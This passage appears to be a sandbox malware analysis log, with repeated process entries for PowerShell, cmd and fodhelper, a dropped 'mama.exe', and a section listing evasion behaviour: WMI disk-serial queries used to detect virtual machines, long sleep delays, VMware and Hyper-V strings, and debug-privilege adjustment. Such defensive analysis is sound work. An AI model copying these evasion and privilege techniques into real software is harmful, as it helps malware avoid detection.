          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\fodhelper.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mama.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mama.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\mama.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_DiskDrive WHERE DeviceID=\'c:\'
          Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_DiskDrive WHERE DeviceID=\'c:\'
          Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1647Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 696Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1271Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6297Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3344Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4905
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4754
          Source: C:\Users\user\AppData\Roaming\mama.exeWindow / User API: threadDelayed 9777
          Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 6680Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 6680Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2312Thread sleep count: 1647 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5868Thread sleep count: 696 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5764Thread sleep count: 36 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3468Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4816Thread sleep count: 1271 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1072Thread sleep count: 146 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 712Thread sleep time: -1844674407370954s >= -30000sJump to behavior
          Source: C:\Windows\System32\svchost.exe TID: 7276Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7644Thread sleep time: -20291418481080494s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7972Thread sleep time: -23058430092136925s >= -30000s
          Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\mama.exeCode function: 46_2_0306E190 FindFirstFileW,FindClose,46_2_0306E190
          Source: C:\Users\user\AppData\Roaming\mama.exeCode function: 46_2_0306DBC4 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,46_2_0306DBC4
          Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: mama.exe, 0000002E.00000002.2524074024.000000000085E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3s@
          Source: powershell.exe, 00000010.00000002.1651729301.000001A5BC7C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: mshta.exe, 00000009.00000003.1670028016.000001FC4D729000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1695409994.000001FC4D72A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
          Source: svchost.exe, 0000000E.00000002.2527759568.000001FA6A22B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
          Source: mshta.exe, 00000009.00000003.1669958089.000001FC4D7B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\H
          Source: mshta.exe, 00000009.00000003.1671405780.000001FC4D7A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1695655072.000001FC4D7A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1687604862.000001FC4D7A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1670028016.000001FC4D7A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1670028016.000001FC4D754000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1695409994.000001FC4D754000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2534493555.000001FA6F85A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: mama.exe, 0000002E.00000003.1698273244.00000000008BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: mama.exe, 0000002E.00000003.1698273244.00000000008BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}7
          Source: powershell.exe, 00000010.00000002.1651729301.000001A5BC770000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW34%SystemRoot%\system32\mswsock.dllF8E56D8EE713118A6B7733A69E09E35C4F1734DC2CD1DE6AC8BAF5167083E43F074961524961B7179D937805AC28E554A85FFB0FCE8FFC6971BD36500B19554E2CF2C414FD3F7D20F637C3FED2CBE4F16D815833AF6587C0445B171F727757FCB88407DA064E176D7AC09BE6F81860913C
          Source: ssh.exe, 00000001.00000002.1704084897.00000284BCAA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllSS
          Source: C:\Users\user\AppData\Roaming\mama.exeAPI call chain: ExitProcess graph end nodegraph_46-2508
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\mama.exeCode function: 46_2_03525340 LoadLibraryA,GetProcAddress,NtQueryVirtualMemory,NtQueryVirtualMemory,46_2_03525340
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
